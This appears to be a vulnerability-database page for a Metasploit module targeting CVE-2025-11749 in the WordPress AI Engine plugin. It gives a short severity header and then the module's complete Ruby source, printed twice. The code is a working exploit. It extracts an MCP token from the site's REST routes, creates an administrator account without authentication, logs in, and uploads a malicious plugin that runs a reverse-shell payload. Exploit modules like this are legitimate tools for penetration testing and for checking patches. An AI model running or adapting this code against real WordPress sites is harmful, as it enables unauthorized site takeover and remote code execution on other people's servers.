9.8
/ 10
CRITICAL
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Description
This module exploits an unauthenticated vulnerability in the WordPress AI Engine plugin versions use exploit/multi/http/wpaienginemcprce msf exploitwpaienginemcprce show targets ...targets... msf exploitwpaienginemcprce set TARGET msf...
Basic Information
ID
MSF:EXPLOIT-MULTI-HTTP-WP_AI_ENGINE_MCP_RCE-
Published
Dec 4, 2025 at 18:55
Affected Product
Affected Versions
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Payload::Php
include Msf::Exploit::FileDropper
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HTTP::Wordpress
prepend Msf::Exploit::Remote::AutoCheck
ERROR_PATTERN = /already exists|username.*taken|user.*exists/i
SUCCESS_PATTERN = /User (?:created|updated|#\d+ updated)|success|created/i
def initialize(info = {})
super(
update_info(
info,
'Name' => 'WordPress AI Engine Plugin MCP Unauthenticated Admin Creation to RCE',
'Description' => %q{
This module exploits an unauthenticated vulnerability in the WordPress AI Engine plugin
(versions <= 3.1.3). The vulnerability allows an attacker to create an administrator account
via the MCP (Model Context Protocol) endpoint without authentication. The module supports
both `/wp-json/mcp/v1/` and `/?rest_route=/mcp/v1/` endpoints. Once an administrator
account is created, the module uploads and executes a malicious plugin to achieve remote
code execution (RCE).
},
'Author' => [
'Emiliano Versini', # Vulnerability discovery
'Khaled Alenazi (Nxploited)', # PoC
'Valentin Lobstein <chocapikk[at]leakix.net>', # Metasploit module
'dledda-r7' # Reviewer
],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2025-11749'],
['URL', 'https://github.com/Nxploited/CVE-2025-11749']
],
'Platform' => %w[php unix linux win],
'Arch' => [ARCH_PHP, ARCH_CMD],
'DisclosureDate' => '2025-11-04',
'DefaultTarget' => 0,
'Privileged' => false,
'Targets' => [
[
'PHP In-Memory',
{
'Platform' => 'php',
'Arch' => ARCH_PHP
# tested with php/meterpreter/reverse_tcp
}
],
[
'Unix/Linux Command Shell',
{
'Platform' => %w[unix linux],
'Arch' => ARCH_CMD
# tested with cmd/linux/http/x64/meterpreter/reverse_tcp
}
],
[
'Windows Command Shell',
{
'Platform' => 'win',
'Arch' => ARCH_CMD
# tested with cmd/windows/http/x64/meterpreter/reverse_tcp
}
]
],
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
}
)
)
register_options(
[
OptString.new('USERNAME', [true, 'Username to create', Faker::Internet.username]),
OptString.new('PASSWORD', [true, 'Password for the new user', Faker::Internet.password(min_length: 8)]),
OptString.new('EMAIL', [true, 'Email for the new user', Faker::Internet.email])
]
)
end
def check
return CheckCode::Unknown unless wordpress_and_online?
plugin_check = check_plugin_version_from_readme('ai-engine', '3.1.4')
return plugin_check if plugin_check == CheckCode::Safe
@token = find_token
return CheckCode::Safe('MCP token not found. Plugin may be patched or not configured.') unless @token
CheckCode::Appears
end
def exploit
fail_with(Failure::NotFound, 'The target does not appear to be using WordPress') unless wordpress_and_online?
@token ||= find_token
fail_with(Failure::NotVulnerable, 'MCP token not found. Plugin may be patched or not configured.') unless @token
username = datastore['USERNAME']
password = datastore['PASSWORD']
email = datastore['EMAIL']
result = create_admin_user(@token, username, password, email)
fail_with(Failure::UnexpectedReply, 'Failed to create administrator account.') if result == false
if result == :user_exists
print_warning('User already exists, updating password and continuing exploitation...')
update_user_password(@token, username, password)
end
admin_cookie = wordpress_login(username, password)
unless admin_cookie
error_msg = 'Failed to log in to WordPress admin.'
error_msg += ' User may exist with a different password.' if result == :user_exists
fail_with(Failure::UnexpectedReply, error_msg)
end
upload_and_execute_payload(admin_cookie)
end
# REST API helpers
def send_rest_request(rest_path, method: 'GET', data: nil)
opts = {
'method' => method,
'ctype' => method == 'POST' ? 'application/json' : nil,
'data' => data
}
uri = normalize_uri(target_uri.path, 'wp-json', rest_path)
res = send_request_cgi(opts.merge('uri' => uri))
return res if res&.code == 200
vars_get = { 'rest_route' => rest_path }
send_request_cgi(opts.merge('uri' => normalize_uri(target_uri.path), 'vars_get' => vars_get))
end
def find_token
extract_token_from_routes(send_rest_request('/'))
end
def extract_token_from_routes(res)
return nil unless res&.code == 200
routes = res.get_json_document&.dig('routes')
return nil unless routes.is_a?(Hash)
mcp_regex = %r{^/mcp/v1/([^/]+)/sse$}
routes.each_key do |route|
next unless route.is_a?(String)
match = route.match(mcp_regex)
next unless match
token = match[1]
next if token == 'sse' || token.empty?
return token
end
nil
end
# MCP API helpers
def send_mcp_request(token, segments, method: 'GET', data: nil)
path = "/mcp/v1/#{token}/#{segments.join('/')}"
send_rest_request(path, method: method, data: data)
end
def build_mcp_payload(tool_name, arguments)
{
'jsonrpc' => '2.0',
'id' => rand(1..999_999),
'method' => 'tools/call',
'params' => {
'name' => tool_name,
'arguments' => arguments
}
}.to_json
end
def send_mcp_tool_call_raw(token, tool_name, arguments)
payload = build_mcp_payload(tool_name, arguments)
res = send_mcp_request(token, ['sse'], method: 'POST', data: payload)
return nil unless res
return nil unless res.code == 200
json_response = res.get_json_document
return nil unless json_response.is_a?(Hash)
json_response.dig('result', 'content')
end
def send_mcp_tool_call(token, tool_name, arguments)
payload = build_mcp_payload(tool_name, arguments)
res = send_mcp_request(token, ['sse'], method: 'POST', data: payload)
return false unless res
return true if res.code == 204
return false unless res.code == 200
json_response = res.get_json_document
return false unless json_response.is_a?(Hash)
error = json_response['error']
return :user_exists if error.is_a?(Hash) && error['code'] == 'existing_user_login'
return :user_exists if error.is_a?(Hash) && error['message']&.match?(ERROR_PATTERN)
result_content = json_response.dig('result', 'content')
return true if result_content&.any? { |item| item['text']&.match?(SUCCESS_PATTERN) }
body = res.body.to_s
return :user_exists if body =~ ERROR_PATTERN
return true if body =~ SUCCESS_PATTERN
false
end
# User management
def get_user_id(token, username)
arguments = {
'search' => username,
'search_columns' => ['user_login']
}
result_content = send_mcp_tool_call_raw(token, 'wp_get_users', arguments)
return nil unless result_content.is_a?(Array)
result_content.each do |item|
next unless item.is_a?(Hash) && item['text']
text = item['text'].to_s
begin
users = JSON.parse(text)
users = [users] unless users.is_a?(Array)
user = users.find { |u| u['user_login'] == username }
return user['ID'].to_i if user && user['ID']
rescue JSON::ParserError
next
end
end
nil
end
def create_admin_user(token, username, password, email)
arguments = {
'user_login' => username,
'user_email' => email,
'user_pass' => password,
'role' => 'administrator'
}
send_mcp_tool_call(token, 'wp_create_user', arguments)
end
def update_user_password(token, username, password)
user_id = get_user_id(token, username)
return false unless user_id
arguments = {
'ID' => user_id,
'fields' => {
'user_pass' => password
}
}
result = send_mcp_tool_call(token, 'wp_update_user', arguments)
print_warning('Password update may have failed, attempting login anyway...') unless result
result
end
# Payload execution
def upload_and_execute_payload(admin_cookie)
plugin_name = "wp_#{Rex::Text.rand_text_alphanumeric(5).downcase}"
payload_name = "ajax_#{Rex::Text.rand_text_alphanumeric(5).downcase}"
zip = generate_plugin(plugin_name, payload_name)
fail_with(Failure::UnexpectedReply, 'Failed to upload the payload') unless wordpress_upload_plugin(plugin_name, zip.pack, admin_cookie)
register_files_for_cleanup("#{payload_name}.php", "#{plugin_name}.php")
register_dir_for_cleanup("../#{plugin_name}")
payload_file = "#{payload_name}.php"
payload_uri = normalize_uri(wordpress_url_plugins, plugin_name, payload_file)
send_request_cgi('uri' => payload_uri, 'method' => 'GET')
end
end
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Payload::Php
include Msf::Exploit::FileDropper
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HTTP::Wordpress
prepend Msf::Exploit::Remote::AutoCheck
ERROR_PATTERN = /already exists|username.*taken|user.*exists/i
SUCCESS_PATTERN = /User (?:created|updated|#\d+ updated)|success|created/i
def initialize(info = {})
super(
update_info(
info,
'Name' => 'WordPress AI Engine Plugin MCP Unauthenticated Admin Creation to RCE',
'Description' => %q{
This module exploits an unauthenticated vulnerability in the WordPress AI Engine plugin
(versions <= 3.1.3). The vulnerability allows an attacker to create an administrator account
via the MCP (Model Context Protocol) endpoint without authentication. The module supports
both `/wp-json/mcp/v1/` and `/?rest_route=/mcp/v1/` endpoints. Once an administrator
account is created, the module uploads and executes a malicious plugin to achieve remote
code execution (RCE).
},
'Author' => [
'Emiliano Versini', # Vulnerability discovery
'Khaled Alenazi (Nxploited)', # PoC
'Valentin Lobstein <chocapikk[at]leakix.net>', # Metasploit module
'dledda-r7' # Reviewer
],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2025-11749'],
['URL', 'https://github.com/Nxploited/CVE-2025-11749']
],
'Platform' => %w[php unix linux win],
'Arch' => [ARCH_PHP, ARCH_CMD],
'DisclosureDate' => '2025-11-04',
'DefaultTarget' => 0,
'Privileged' => false,
'Targets' => [
[
'PHP In-Memory',
{
'Platform' => 'php',
'Arch' => ARCH_PHP
# tested with php/meterpreter/reverse_tcp
}
],
[
'Unix/Linux Command Shell',
{
'Platform' => %w[unix linux],
'Arch' => ARCH_CMD
# tested with cmd/linux/http/x64/meterpreter/reverse_tcp
}
],
[
'Windows Command Shell',
{
'Platform' => 'win',
'Arch' => ARCH_CMD
# tested with cmd/windows/http/x64/meterpreter/reverse_tcp
}
]
],
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
}
)
)
register_options(
[
OptString.new('USERNAME', [true, 'Username to create', Faker::Internet.username]),
OptString.new('PASSWORD', [true, 'Password for the new user', Faker::Internet.password(min_length: 8)]),
OptString.new('EMAIL', [true, 'Email for the new user', Faker::Internet.email])
]
)
end
def check
return CheckCode::Unknown unless wordpress_and_online?
plugin_check = check_plugin_version_from_readme('ai-engine', '3.1.4')
return plugin_check if plugin_check == CheckCode::Safe
@token = find_token
return CheckCode::Safe('MCP token not found. Plugin may be patched or not configured.') unless @token
CheckCode::Appears
end
def exploit
fail_with(Failure::NotFound, 'The target does not appear to be using WordPress') unless wordpress_and_online?
@token ||= find_token
fail_with(Failure::NotVulnerable, 'MCP token not found. Plugin may be patched or not configured.') unless @token
username = datastore['USERNAME']
password = datastore['PASSWORD']
email = datastore['EMAIL']
result = create_admin_user(@token, username, password, email)
fail_with(Failure::UnexpectedReply, 'Failed to create administrator account.') if result == false
if result == :user_exists
print_warning('User already exists, updating password and continuing exploitation...')
update_user_password(@token, username, password)
end
admin_cookie = wordpress_login(username, password)
unless admin_cookie
error_msg = 'Failed to log in to WordPress admin.'
error_msg += ' User may exist with a different password.' if result == :user_exists
fail_with(Failure::UnexpectedReply, error_msg)
end
upload_and_execute_payload(admin_cookie)
end
# REST API helpers
def send_rest_request(rest_path, method: 'GET', data: nil)
opts = {
'method' => method,
'ctype' => method == 'POST' ? 'application/json' : nil,
'data' => data
}
uri = normalize_uri(target_uri.path, 'wp-json', rest_path)
res = send_request_cgi(opts.merge('uri' => uri))
return res if res&.code == 200
vars_get = { 'rest_route' => rest_path }
send_request_cgi(opts.merge('uri' => normalize_uri(target_uri.path), 'vars_get' => vars_get))
end
def find_token
extract_token_from_routes(send_rest_request('/'))
end
def extract_token_from_routes(res)
return nil unless res&.code == 200
routes = res.get_json_document&.dig('routes')
return nil unless routes.is_a?(Hash)
mcp_regex = %r{^/mcp/v1/([^/]+)/sse$}
routes.each_key do |route|
next unless route.is_a?(String)
match = route.match(mcp_regex)
next unless match
token = match[1]
next if token == 'sse' || token.empty?
return token
end
nil
end
# MCP API helpers
def send_mcp_request(token, segments, method: 'GET', data: nil)
path = "/mcp/v1/#{token}/#{segments.join('/')}"
send_rest_request(path, method: method, data: data)
end
def build_mcp_payload(tool_name, arguments)
{
'jsonrpc' => '2.0',
'id' => rand(1..999_999),
'method' => 'tools/call',
'params' => {
'name' => tool_name,
'arguments' => arguments
}
}.to_json
end
def send_mcp_tool_call_raw(token, tool_name, arguments)
payload = build_mcp_payload(tool_name, arguments)
res = send_mcp_request(token, ['sse'], method: 'POST', data: payload)
return nil unless res
return nil unless res.code == 200
json_response = res.get_json_document
return nil unless json_response.is_a?(Hash)
json_response.dig('result', 'content')
end
def send_mcp_tool_call(token, tool_name, arguments)
payload = build_mcp_payload(tool_name, arguments)
res = send_mcp_request(token, ['sse'], method: 'POST', data: payload)
return false unless res
return true if res.code == 204
return false unless res.code == 200
json_response = res.get_json_document
return false unless json_response.is_a?(Hash)
error = json_response['error']
return :user_exists if error.is_a?(Hash) && error['code'] == 'existing_user_login'
return :user_exists if error.is_a?(Hash) && error['message']&.match?(ERROR_PATTERN)
result_content = json_response.dig('result', 'content')
return true if result_content&.any? { |item| item['text']&.match?(SUCCESS_PATTERN) }
body = res.body.to_s
return :user_exists if body =~ ERROR_PATTERN
return true if body =~ SUCCESS_PATTERN
false
end
# User management
def get_user_id(token, username)
arguments = {
'search' => username,
'search_columns' => ['user_login']
}
result_content = send_mcp_tool_call_raw(token, 'wp_get_users', arguments)
return nil unless result_content.is_a?(Array)
result_content.each do |item|
next unless item.is_a?(Hash) && item['text']
text = item['text'].to_s
begin
users = JSON.parse(text)
users = [users] unless users.is_a?(Array)
user = users.find { |u| u['user_login'] == username }
return user['ID'].to_i if user && user['ID']
rescue JSON::ParserError
next
end
end
nil
end
def create_admin_user(token, username, password, email)
arguments = {
'user_login' => username,
'user_email' => email,
'user_pass' => password,
'role' => 'administrator'
}
send_mcp_tool_call(token, 'wp_create_user', arguments)
end
def update_user_password(token, username, password)
user_id = get_user_id(token, username)
return false unless user_id
arguments = {
'ID' => user_id,
'fields' => {
'user_pass' => password
}
}
result = send_mcp_tool_call(token, 'wp_update_user', arguments)
print_warning('Password update may have failed, attempting login anyway...') unless result
result
end
# Payload execution
def upload_and_execute_payload(admin_cookie)
plugin_name = "wp_#{Rex::Text.rand_text_alphanumeric(5).downcase}"
payload_name = "ajax_#{Rex::Text.rand_text_alphanumeric(5).downcase}"
zip = generate_plugin(plugin_name, payload_name)
fail_with(Failure::UnexpectedReply, 'Failed to upload the payload') unless wordpress_upload_plugin(plugin_name, zip.pack, admin_cookie)
register_files_for_cleanup("#{payload_name}.php", "#{plugin_name}.php")
register_dir_for_cleanup("../#{plugin_name}")
payload_file = "#{payload_name}.php"
payload_uri = normalize_uri(wordpress_url_plugins, plugin_name, payload_file)
send_request_cgi('uri' => payload_uri, 'method' => 'GET')
end
end